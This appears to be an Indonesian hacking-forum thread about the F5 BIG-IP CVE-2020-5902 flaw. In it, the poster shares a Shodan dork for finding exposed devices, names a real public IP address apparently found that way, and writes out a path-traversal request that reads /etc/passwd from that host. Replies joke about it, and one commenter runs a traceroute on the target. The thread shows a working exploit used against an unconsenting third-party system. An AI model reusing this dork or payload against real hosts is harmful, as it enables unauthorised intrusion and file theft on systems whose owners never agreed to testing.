Big-IP CVE-2020-5902

Btw ini sempet heboh nih, awal-awal juli kemarin releasenya
pas gue ultah sayangnya gk ada yg ucapin met ultah *eh
kl misal pada langganan newsletter di securityfocus
ini smpet jadi bahasan di milis nya
serius gan ane gak ngerti ini apa, cuma ngerasa keren aja bisa posting beginian

kurang lebih begini lah isinya :

Blockquote to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable.

pake shodan ya jangan lupa fufufufu shodan.io
dork nya ini

http.title:“BIG-IP®- Redirect”

(selebihnya bisa baca ini :
https://www.cspshivam.com/post/how-to-find-and-exploit-cve-2020-5902)

terus ketemu ini
https://35.221.124.131:8443

terus gue pake ini :

pake metasploit juga boleh, terus ketemunya ini

https://35.221.124.131:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

dari sini gw udh lupa LFI atw RFD gimana tekniknya

serius gw jadi inget kotom,flyff,ketiak atw bug hunter2 pro nya DC
(dulu si kotom ada remote root xpl nya F5)
kl mereka aktif lg di sini pasti ganteng abis
apalg kl ada tek0,ditatom sama wen collabs create tuls nya
wah yg ashiap ashiap itu mah kalah gokil

lebih lengkapnya baca ini aja gan

terima kasih ya gan

2 Likes

:cambuk:

Happy birthday om cakill

Bagi akun shodan.io dong. :tagih:

[root@2jz-gte-tunnel ~]# traceroute -A 35.221.124.131
traceroute to 35.221.124.131 (35.221.124.131), 30 hops max, 60 byte packets
 1  _gateway (103.244.204.xx) [AS131759]  0.401 ms  0.371 ms  0.351 ms
 2  * * *
 3  border-local.wds.co.id (103.244.204.xx) [AS131759]  0.384 ms  0.396 ms  0.398 ms
 4  tengiga-0-1.openixp.net (218.100.36.xx) [*]  0.624 ms  * *
 5  google.openixp.net (218.100.36.xx) [*]  1.726 ms  1.691 ms  1.684 ms
 6  142.250.61.xx (142.250.61.xx) [AS15169]  1.671 ms  1.896 ms 142.250.61.xx (142.250.61.xx) [AS15169]  1.251 ms
 7  74.125.245.xx (74.125.245.xx) [AS15169]  1.853 ms 74.125.245.xx (74.125.245.xx) [AS15169]  2.001 ms 74.125.245.xx (74.125.245.xx) [AS15169]  1.268 ms

...
dst...

35.221.124.131 => AS15169 => Google LLC => 35.220.0.0/14 => GOOGLE-CLOUD :shock:
Enterprise client ntuh pasti. :smangat:

Anyway, ni waktu itu sempet trending berhari2 Last 20 Scored Vulnerability di nvd.nist.gov

hahahaha makasih makasi om
btw maaf om kagak punya akun shodan

hahaha gk bs take over dit, cm nemu bug tok